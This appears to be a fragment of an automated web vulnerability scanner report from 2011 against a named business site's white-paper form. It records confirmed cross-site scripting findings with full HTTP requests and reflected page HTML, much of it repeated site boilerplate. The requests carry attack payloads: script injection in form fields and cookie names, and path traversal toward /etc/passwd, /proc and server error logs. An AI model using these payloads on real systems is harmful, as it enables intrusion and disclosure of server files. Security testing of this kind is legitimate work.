Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="'"--></style></script><script>netsparker(0x000472)</script>"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>&am..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST '"--></style></script><script>alert(0x000499)</script>
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000499)%3c%2fscript%3e&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:18 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=294AE1C227BA40E3436EFCBE59B0790A; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="'"--></style></script><script>netsparker(0x000499)</script>"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST '"--></style></script><script>alert(0x0004AB)</script>
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
